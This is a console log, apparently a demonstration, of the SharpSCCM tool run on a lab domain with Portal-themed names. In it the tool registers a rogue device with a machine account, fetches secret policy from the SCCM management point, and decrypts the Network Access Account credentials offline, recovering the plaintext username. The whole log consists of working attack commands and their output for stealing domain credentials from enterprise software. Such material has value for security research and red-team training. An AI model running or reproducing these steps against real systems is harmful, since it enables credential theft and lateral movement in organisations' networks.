.\SharpSCCM.exe get naa -u chell$ -p <password>
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | |
[+] Connecting to \\localhost\root\ccm
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
[+] Current management point: atlas.aperture.sci
[+] Site code: PS1
[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Wrote "ConfigMgr Client Messaging" certificate to My store for CurrentUser
[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
FQDN: CAVE-JOHNSON-PC.APERTURE
NetBIOS name: CAVE-JOHNSON-PC
Authenticating as: chell$
Site code: PS1
[+] Sending HTTP registration request to atlas.aperture.sci:80
[+] Received unique GUID for new device: GUID:A7FC423E-FF62-48B1-8A42-9447178D16C5
[+] Obtaining Full Machine policy assignment from atlas.aperture.sci PS1
[+] Found 43 policy assignments
[+] Found policy containing secrets:
ID: {096db290-7e52-41cb-839c-b8af87b82abf}
Flags: RequiresAuth, Secret, IntranetOnly, PersistWholePolicy
URL: http://<mp>/SMS_MP/.sms_pol?{096db290-7e52-41cb-839c-b8af87b82abf}.4_00
[+] Adding authentication headers to download request:
ClientToken: GUID:A7FC423E-FF62-48B1-8A42-9447178D16C5;2022-10-17T23:24:00Z;2
ClientTokenSignature: 9BAF8C2981B17DE0E056C42E8E4605B72A0559CE30C245E06CADC65A25A37D342595B6DCC542ABB9C20A01E9D1E71B1E8B52E8CF6B9C6214C76CA1C636B301031E15E8A53D1A2E52E18416F6A77F1BD8D793184995D93423E1F346E6B131CE07908DC26FB20CCF09F1B1FC2318104C7145B69D6870819CB9B35C8F87C3CB311211F84BA812EC15AAD7C3E512BF73D67A5AA7EA180E07E35E712CC69DF034183BA89C5937AC3EF954E5B3D8401172B6C0850695436180FD3A4185F4702F2647AE1E747BD5D64707123F003958CF110E7191CE5D299F97CCE4D01965F92496C748DD0F0A20CDB3F469C8BB5A33340142CD91B8F1C7D3082EC6B86080072783390A
[+] Received encoded response from
server for policy {096db290-7e52-41cb-839c-b8af87b82abf}
[+] Successfully decoded and decrypted secret policy
[+] Deleted "CN=ConfigMgr Client Messaging" certificate from My store for CurrentUser
[+] Encrypted NAA username: 89130000...<REDACTED>...6C006F00
[+] Encrypted NAA password: 89130000...<REDACTED>...8D3C0000
[+] Done! Encrypted NAA hex strings can be decrypted offline using the "DeobfuscateNAAString.exe <string>" command
..\..\..\DeobfuscateNAAString\Release\DeobfuscateNAAString.exe 89130000...<REDACTED>...06C006F00
Plaintext: APERTURE\networkaccess
..\..\..\DeobfuscateNAAString\Release\DeobfuscateNAAString.exe 89130000...<REDACTED>...8D3C0000
Plaintext: <REDACTED>